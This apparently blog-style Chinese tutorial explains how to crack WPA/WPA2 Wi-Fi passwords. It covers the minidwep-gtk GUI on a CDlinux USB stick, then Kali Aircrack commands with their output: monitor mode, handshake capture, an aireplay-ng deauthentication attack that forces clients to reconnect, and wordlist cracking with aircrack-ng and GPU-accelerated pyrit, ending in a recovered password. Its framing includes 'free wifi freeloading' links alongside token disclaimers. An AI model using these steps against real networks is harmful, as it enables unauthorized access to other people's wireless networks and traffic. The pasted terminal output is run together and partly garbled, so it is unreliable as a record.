用kali linux抓取wifi握手包并暴力破解

kali linux前身是BT5系统，作为渗透测试人员的标配装备，在这就不过多介绍了，接下来我们要使用kali linux完成抓取握手包，破解密码整个过程。

主要使用Aircrack套装软件

附：

Kali Linux使用Aircrack破解wifi密码(wpa/wpa2)

wifi是一种允许电子设备连接到一个无线局域网WLAN的技术，通常使用2.4G UHF或5G SHF ISM 射频频段。连接到wifi通常是有密码保护的，但也可是开放的，这样就允许任何在wifi范围内的设备可以连接上，那么如果要有wifi密码的，你知道要怎么破解wifi密码并可以查看到密码吗?下面是我整理的一些关于破解wifi密码并可以查看到密码的相关资料，供你参考。

破解wifi密码并可以查看密码需要的工具

1G或者更大U盘 一个

CDlinux镜像,Unetbootin工具(启动盘刻录工具)

破解wifi密码并可以查看密码的步骤1、CDlinux U盘启动

打开Unetbootin，利用它将CDlinux安装到U盘上，按下图设置

发行版本上选择BackTrack，该版本就为适合我们的CDlinux运行环境，之后选择下载好的CDlinux镜像，最后选择我们的U盘盘符，记住别选错哈! 点击确定，程序开始制作，这些都是自动的，我们要做的只有等待就成了!

制作完成后，会提示重启，这里我们点退出。暂不重启。

破解wifi密码并可以查看密码的步骤2.设置 BIOS 启动方式以U盘启动

根据不同的电脑，此步骤不是很一样，你们可以百度下自己型号的电脑怎么以U盘启动，不再多说,启动后，如下图，进入此界面，在一个停止的界面选择语言界面，选择中文界面。

破解wifi密码并可以查看密码的步骤3.进入CDlinux *** 作

进入后会出现以下桌面，有么有看见文件名为“minidwep-gtk”程序，双击打开。

每次运行都会d出一个提示窗口。

破解wifi密码并可以查看密码的步骤4、使用工具

上面的说明，大家都懂得，勿用于非法用途。。下面详细介绍下该工具的主界面(如图)。

1)无线网卡 wlan0。这里显示自己的无线网卡信息。

2)信道，加密方式。信道就默认选All全部，加密方式分WEP、WPA/WPA2两种。下面的方式选择选择默认吧。

3)显示路由的mac地址、名称、强度、信道、加密方式等。

4)这一竖条都是功能按钮，点击实现相关功能。

5)这里扫描的时候相关状态进度显示。

看到界面之后，直接点上图4中的扫描按钮，就会看到中间的进度条再走了。 稍等片刻，就能看到路由的MAC、名称、强度、信道、加密方式等。 这里以加密方式为WPA/WPA2为例，WEP后面再说(因为更容易破)。

点击我们需要破解的路由名称，点右侧的启动，下放就会进行“握手” *** 作了，不停的与路由进行连接，这个过程是自动的，视路由及信号相关强度绝对时间的长短。

当“握手”成功后，就会你相关提示，看到下图，就说明我们离成功更进一步了。

再稍等片刻，就会提示获取到握手包了。问我们是否选择一个字典来搜寻密码，点“Yes”之后再点“OK”。

选择d出窗口中的“wordlist.txt”这个是此镜像附带的，选中点击右下角“OK”。之后就是密码破解过程了，这个看运气和字典强度了。曾经有人分享给3G大小的密码包，按照这速度，一顿饭差不多能出结果了，如果不是特别BT的密码的话!跑字典过程如下图。

当软件自动扫描到密码后，会自动d出的，破解成功，下面就是账号密码了。

注意事项

这个只是玩玩，有时候密码字典不够大，失败的可能，这个只是玩玩，请别用到非法用途，以上工具自己从网上下载。

破解wifi密码并可以查看密码的相关 文章 ：

1. wifi如何破解密码

2. 破解无线网络的WIFI密码的方法是什么

3. 黑客如何破解WIFI密码

4. 免费蹭网破解wifi密码的方法

首先需要有一台运行kali linux的机器，无论是虚拟机或物理机，一块支持监听模式的无线网卡

root@kali:~# iwconfig wlan1 IEEE 802.11bg ESSID:off/anyMode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off eth0 no wireless extensions.lono wireless extensions.

查看无线网卡设备名

root@kali:~# airmon-ng start wlan1Found 2 processes that could cause trouble.If airodump-ng, aireplay-ng or airtun-ng stops working aftera short period of time, you may want to kill (some of) them!-e PID Name2772dhclient4415wpa_supplicantInterface Chipset Driverwlan1 Realtek RTL8187Lrtl8187 - [phy0](monitor mode enabled on mon0)

进入监听模式

airodump-ng mon0 会列出搜索到的所有无线网络

从中找到你要测试破解的，copy下来BSSID

root@kali:~/test# airodump-ng -w nenew -c 11 --bssid E4:D3:32:41:56:12 mon0 CH 11 ][ Elapsed: 1 min ][ 2014-09-12 23:31 ][ WPA handshake: E4:D3:32:41:56:12 BSSID PWR RXQ Beacons#Data, #/s CH MB ENC CIPHER AUTH ESSIDE4:D3:32:41:56:12 -44 53 17170 11 54e. WPA2 CCMP PSK TP-LINK_5612 BSSID STATIONPWR RateLostFrames Probe E4:D3:32:41:56:12 00:00:00:00:00:0000 - 1 018135 E4:D3:32:41:56:12 64:B4:73:40:60:5C -211e- 6e 07

当看到WPA handshake:说明抓到了握手包，就可以来破解了

如果一直抓不到，可以用如下命令来攻击，强迫重新握手

aireplay-ng -0 10 -a E4:D3:32:41:56:12 -c 64:B4:73:40:60:5C mon0 --ignore-negative-one

抓到握手包后，就可以用字典来跑密码了。

root@kali:~/test# aircrack-ng -w ./password.txt nenew-21.cap Opening nenew-21.capRead 18654 packets. # BSSID ESSID Encryption 1 D0:C7:C0:6E:53:53 TP-LINK_5353 WPA (1 handshake)Choosing first network as target.Opening nenew-21.capReading packets, please wait...

跑的速度如何取决于你机器的性能，更取决于你的字典

如果用物理机，有比较好的显卡，还可以用显卡来加速破解，效率比cpu高的多

kali linux下装显卡驱动，sdk等，参考如下链接

http://xiao106347.blog.163.com/blog/static/2159920782013113013549364

http://vistb.net/2011/08/how-to-crack-wifi-part-four/

http://blog.sina.com.cn/s/blog_56a70c040101exje.html

我这里用显卡，很快就跑出了密码

root@kali:~# pyrit -r nenew-21.cap -i password.txt -b D0:C7:C0:6E:53:53 attack_passthroughPyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.comThis code is distributed under the GNU General Public License v3+Parsing file 'nenew-21.cap' (1/1)...Parsed 14 packets (14 802.11-packets), got 1 AP(s)Tried 4420221 PMKs so far86496 PMKs per second.The password is 'qq123789'.

---